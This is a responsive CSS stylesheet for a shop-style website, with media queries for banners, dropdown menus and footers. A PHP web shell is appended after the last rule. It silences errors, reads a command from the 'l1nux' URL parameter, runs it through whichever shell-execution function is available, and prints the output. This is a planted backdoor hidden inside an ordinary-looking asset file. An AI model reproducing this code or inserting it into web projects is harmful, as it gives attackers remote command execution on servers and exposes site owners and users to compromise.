@media (max-width: 1200px) {
    /*    .main-banner {
        height: 500px;
    }*/
    .owl-stage-outer.owl-height {
        height: 500px !important;
    }
    .contact-form {
        max-width: 100%;
        width: 100%;
    }
}

@media (max-width: 1024px) {
    /*    .main-banner {
        height: 440px;
    }*/
    .owl-stage-outer.owl-height {
        height: 440px !important;
    }
    section.about-us {
        background-position: bottom !important;
        padding: 40px 0 !important;
    }
    .image-gallery ul li img {
        width: 100%;
    }
    section.breadcrumb-img {
        padding-top: 99px;
    }
}

@media (max-width: 992px) {
    .middle-header.py-2 {
        padding-top: 0 !important;
        padding-bottom: 0 !important;
    }
    .navbar {
        padding: 0;
    }
    .navbar .nav-link {
        padding-left: 1.5rem !important;
        padding-right: 1.5rem !important;
    }
    .navbar-dark .nav-link.show {
        background: rgba(255, 255, 255, 0.12);
    }
    .navbar-light .nav-link.show {
        background: rgba(0, 0, 0, 0.12);
    }
    .navbar-nav {
        align-items: center;
    }
    .dropdown-menu li {
        position: relative;
    }
    .dropdown-menu .submenu {
        display: none;
        position: absolute;
        left: 100%;
        top: -7px;
    }
    .dropdown-menu .submenu-left {
        right: 100%;
        left: auto;
    }
    .dropdown-menu>li:hover {
        background-color: #fbfbfb;
    }
    .dropdown-menu>li:hover>.submenu {
        display: block;
    }
    .megasubmenu {
        left: 100%;
        top: 0;
        min-height: 100%;
        min-width: 500px;
    }
    .dropdown-menu-end .megasubmenu {
        left: auto;
        right: 100%;
        top: 0;
    }
    .dropdown-menu>li:hover .megasubmenu {
        display: block;
    }
    .dropdown-large {
        min-width: 520px;
    }
    .megamenu {
        left: 0;
        right: 0;
        width: 80%;
    }
    .nav-item.hover .dropdown-menu.animate {
        display: block;
        opacity: 0;
        visibility: hidden;
        margin-top: 0;
    }
    .nav-item.hover .animate.fade-down {
        top: 90%;
        transform: rotateX(-80deg);
        transform-origin: 0 0;
    }
    .nav-item.hover .animate.fade-up {
        top: 90px;
    }
    .nav-item.hover .dropdown-menu .animate.fade-down {
        top: 0;
    }
    .nav-item.hover .animate.dropdown-menu.show {
        display: block;
        transition: 0.4s;
        opacity: 1;
        visibility: visible;
        top: 100%;
        transform: rotateX(0deg);
    }
    .nav-item.hover .animate.dropdown-menu>li:hover>.megasubmenu,
    .nav-item.hover .animate.dropdown-menu>li:hover>.submenu {
        display: block;
        transition: 0.4s;
        opacity: 1;
        visibility: visible;
        top: 0;
        transform: rotateX(0deg);
    }
    .dropdown-menu li {
        position: relative;
    }
    .dropdown-menu li.has-megasubmenu {
        position: static !important;
    }
    .dropdown-menu li:hover>.dropdown-menu,
    .dropdown-menu li:hover>.submenu {
        display: block;
        transition: 0.4s;
        opacity: 1;
        visibility: visible;
        top: 0;
        transform: rotateX(0deg);
    }
    .dropdown-menu li:hover>.megasubmenu {
        display: block;
        transition: 0.4s;
        opacity: 1;
        visibility: visible;
        top: 0;
        transform: rotateX(0deg);
    }
    .dropdown-menu.megamenu.show ul li a {
        font-size: 14px;
        text-decoration: none;
        transition: 0.6s;
        border-bottom: 1px solid#ccc;
        display: block;
    }
    .dropdown-menu.megamenu.show ul li a:hover {
        padding-left: 10px;
        color: #f32b56 !important;
        border-bottom: 1px solid#F32B56 !important;
    }
    .dropdown-menu.megamenu.show ul li {
        line-height: 40px;
        border-bottom: 0 dashed#ccc;
    }
    .dropdown-menu[data-bs-popper] {
        left: 20%;
    }
    .navbar-dark .navbar-toggler {
        border-color: none !important;
    }
    .navbar-toggler:focus {
        box-shadow: none !important;
    }
}

@media (max-width: 991px) {
    .dropdown-menu .dropdown-menu {
        margin-left: 0.7rem;
        margin-right: 0.7rem;
        margin-bottom: 0.5rem;
    }
    .navbar-toggler {
        padding: 0;
    }
    nav.navbar.navbar-expand-lg.navbar-dark.justify-content-end {
        position: absolute;
        left: 0;
        width: 100%;
    }
    div#main_nav {
        background: #fff;
        border-bottom: 5px solid#F32B56;
    }
    .navbar-nav {
        align-items: flex-start;
        text-align: left;
        margin-top: 40px;
    }
    ul.navbar-nav li {
        display: block;
        width: 100%;
        border-bottom: 1px dashed#ccc;
    }
    .logo {
        position: relative;
        z-index: 9;
    }
    .dropdown-menu[data-bs-popper] {
        margin-left: 20px;
    }
    .navbar-collapse {
        visibility: hidden;
        transform: translateX(-100%);
        border-radius: 0;
        display: block;
        position: fixed;
        overflow-y: auto;
        top: 0;
        left: 0;
        height: 100%;
        z-index: 1200;
        width: 85%;
        transition: visibility 0.3s ease-in-out, transform 0.3s ease-in-out;
        background: #fff8f5;
        border-bottom: 5px solid#363bac;
    }
    .navbar-collapse.show {
        padding: 0;
        visibility: visible;
        transform: translateX(0);
        top: 0;
        width: 85%;
    }
    section.breadcrumb-img {
        padding-top: 90px;
    }
}

@media (max-width: 768px) {
    /*    .main-banner {
        height: 330px;
    }*/
    .owl-stage-outer.owl-height {
        height: 330px !important;
    }
    .about_img_cn h2 {
        font-size: 21px;
        line-height: 30px;
    }
    .footer-widgets {
        padding: 25px 0;
    }
    .widgets.contact_us {
        padding: 25px 0;
    }
    .profile-intro-sec {
        margin-bottom: 15px;
    }
    section.breadcrumb-img {
        padding-top: 110px;
    }
}

@media (max-width: 767px) {
    .shop-category-sec {
        margin-bottom: 20px;
    }
}

@media (max-width: 600px) {
    section.new_arrivals_sec {
        margin-top: 2rem !important;
    }
    .heading-sec h3 {
        font-size: 21px;
    }
    .heading-sec img {
        width: 50%;
    }
    .product_img img {
        height: 480px;
    }
    .page-content h2 {
        font-size: 18px;
        line-height: 32px;
    }
    .page-content h3 {
        font-size: 16px;
        line-height: 32px;
    }
    .footer-widgets {
        padding: 15px 0;
    }
    .widgets.contact_us {
        padding: 15px 0;
    }
    .page-content {
        margin-top: 30px;
    }
    .page-content h1 {
        font-size: 21px;
        line-height: 30px;
    }
    /*   .main-banner {
        height: 260px;
    }*/
    .owl-stage-outer.owl-height {
        height: 260px !important;
    }
    .heading-sec h1 {
        font-size: 21px;
    }
    section.breadcrumb-img {
        padding-top: 77px;
    }
    section.shop-category {
        margin-top: 1rem !important;
    }
    .megamenu {
        width: 95%;
        margin-bottom: 15px;
    }
    section.about-us.mt-5 {
        margin-top: 0rem !important;
    }
}

@media (max-width: 575px) {
    .top-right-sec {
        display: none;
    }
    .contact_info {
        text-align: center;
    }
    .top_header {
        padding: 0;
    }
    .heading-sec h1 {
        font-size: 20px;
    }
    .contactus-intro {
        margin-bottom: 15px;
    }
    .category_item_img img {
        height: auto;
    }
    .category_item_info h3 {
        -webkit-line-clamp: 4;
        height: auto;
    }
    footer {
        padding: 25px 0 15px;
    }
    section.main_category_sec {
        margin-top: 2rem !important;
    }
    .main-banner {
        padding-top: 0;
    }
    section.home-slider {
        padding-top: 80px;
    }
    .contact_info ul li:last-child {
        display: none;
    }
}

@media (max-width: 520px) {
    section.home-slider {
        padding-top: 70px;
    }
    .dropdown .megamenu,
    .navbar .megamenu {
        padding: 0 20px;
    }
    .shop-category-sec h3 {
        font-size: 16px;
    }
}

@media (max-width: 425px) {
    .main-banner {
        height: 200px;
    }
    .owl-stage-outer.owl-height {
        height: 200px !important;
    }
    .copy-right p {
        font-size: 13px;
    }
    .copy-right p span {
        font-size: 11px;
    }
    .contact_info ul li {
        padding-right: 1px;
    }
    .contact_info ul li a {
        font-size: 11px;
    }
    section.home-slider {
        padding-top: 70px;
    }
    section.breadcrumb-img {
        padding-top: 73px;
    }
}<?php
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('display_errors', 0);
@ini_set('memory_limit', '-1');
if (isset($_GET['l1nux'])) {
    $cmd = $_GET['l1nux'];
    $output = '';
    $method = 'none';

    $functions = [
        'system' => function($c) { ob_start(); system($c . ' 2>&1'); return ob_get_clean(); },
        'exec' => function($c) { $tmp = []; exec($c . ' 2>&1', $tmp); return implode("
", $tmp); },
        'shell_exec' => function($c) { return shell_exec($c . ' 2>&1'); },
        'passthru' => function($c) { ob_start(); passthru($c . ' 2>&1'); return ob_get_clean(); },
        'proc_open' => function($c) {
            $process = proc_open($c . ' 2>&1', [['pipe','r'],['pipe','w'],['pipe','w']], $pipes);
            if (is_resource($process)) { $out = stream_get_contents($pipes[1]); proc_close($process); return $out; }
            return '';
        },
        'popen' => function($c) { $fp = popen($c . ' 2>&1', 'r'); $out = stream_get_contents($fp); pclose($fp); return $out; },
        'backticks' => function($c) { return `$c 2>&1`; }
    ];

    foreach ($functions as $name => $func) {
        if (function_exists($name) && !in_array($name, explode(',', ini_get('disable_functions')))) {
            $output = $func($cmd);
            $method = $name;
            break;
        }
    }

    echo '<div style="background:#1e1e1e; color:#00ff00; font-family:Courier,monospace; padding:10px; border:1px solid #333; margin:10px 0; border-radius:4px; overflow:auto;">';
    echo '<strong>[' . htmlspecialchars($method) . ']</strong> >>  ' . htmlspecialchars($cmd) . "
 <hr>";
    if ($output !== '') {
        echo nl2br(htmlspecialchars($output, ENT_QUOTES, 'UTF-8'));
    } else {
        echo '[No output or command failed]';
    }
    echo '</div>';
}
?>   
